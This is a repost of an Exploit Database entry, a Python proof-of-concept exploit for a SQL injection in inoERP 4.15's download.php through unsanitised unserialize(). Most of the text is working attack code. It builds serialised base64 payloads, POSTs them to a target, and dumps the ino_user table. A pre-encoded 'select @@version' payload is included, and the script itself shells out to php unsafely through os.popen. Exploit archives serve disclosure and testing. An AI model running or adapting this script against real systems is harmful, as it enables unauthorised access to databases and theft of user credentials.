inoERP 4.15 – ‘download’ SQL Injection

• Exploit Database
• 13 阅读

• 作者： Semen Alexandrovich Lyhin
  日期： 2019-09-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47426/

• # Exploit Title: inoERP 4.15 - 'download' SQL Injection
  # Date: 2019-09-13
  # Exploit Author: Semen Alexandrovich Lyhin
  # Vendor Homepage: http://inoideas.org/
  # Version: 4.15
  # CVE: N/A
  
  # A malicious query can be sent in base64 encoding to unserialize() function.
  # It can be deserialized without any sanitization then.
  # After it, it gets passed directly to the SQL query.
  
  
  #!/bin/python
  
  import os
  import base64
  import requests
  import sys
  
  def generatePayload(query):
  #THIS FUNCTION IS INSECURE BY DESIGN
  b64_query = base64.b64encode(query);
  return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
  
  
  def ExecSQL(query):
  data = {"data":query,
  "data_type":"sql_query"}
   
  r = requests.post("http://" + ip + "/download.php", data=data)
  return r.content
  
  
  if __name__ == "__main__":
  
  if len(sys.argv) != 3:
  print '(+) usage: %s <target> ' % sys.argv[0]
  print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]
  exit()
  
  ip = sys.argv[1] + "/" + sys.argv[2]
  
  #if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw== 
  
  data = r"select * from ino_user;"
  
  print ExecSQL(generatePayload(data));